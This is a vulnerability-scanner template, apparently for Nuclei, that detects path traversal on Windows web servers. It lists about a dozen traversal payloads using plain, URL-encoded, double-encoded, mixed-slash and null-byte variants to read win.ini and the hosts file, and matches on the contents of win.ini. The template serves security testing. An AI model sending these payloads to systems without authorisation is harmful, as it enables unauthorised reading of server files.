id: windows-path-traversal-winini-xandsz_windows

info:
  name: Windows Path Traversal - win.ini (Deep Traversal)_windows
  author: xandsz
  severity: medium
  description: |
    Detecta Path Traversal em servidores Windows tentando acessar
    arquivos sensíveis como win.ini usando múltiplos níveis
    e variações de encoding, incluindo bypass via requisições AJAX.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-22
  metadata:
    max-request: 20
  tags: traversal,lfi,windows

http:
  - method: GET

    headers:
      X-Requested-With: XMLHttpRequest

    path:
      # === win.ini (clássico) ===
      - "{{BaseURL}}/../../../../../Windows/win.ini"
      - "{{BaseURL}}/../../../../../../Windows/win.ini"
      - "{{BaseURL}}/../../../../../../../Windows/win.ini"

      # === System32 ===
      - "{{BaseURL}}/../../../../../Windows/System32/drivers/etc/hosts"

      # === Encoding básico ===
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2fWindows%2fwin.ini"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts"

      # === Backslash encoding ===
      - "{{BaseURL}}/..%5c..%5c..%5c..%5cWindows%5cwin.ini"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts"

      # === Mixed slash ===
      - "{{BaseURL}}/..%2f..%5c..%2f..%5cWindows%5cwin.ini"

      # === Double encoding ===
      - "{{BaseURL}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/Windows/win.ini"
      - "{{BaseURL}}/..%255c..%255c..%255c..%255cWindows%255cwin.ini"

      # === UNC / path confusion ===
      - "{{BaseURL}}/....//....//Windows/win.ini"

      # === Null byte ===
      - "{{BaseURL}}/../../../../../Windows/win.ini%00"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "[fonts]"
          - "[extensions]"
          - "[mci extensions]"

      - type: status
        status:
          - 200
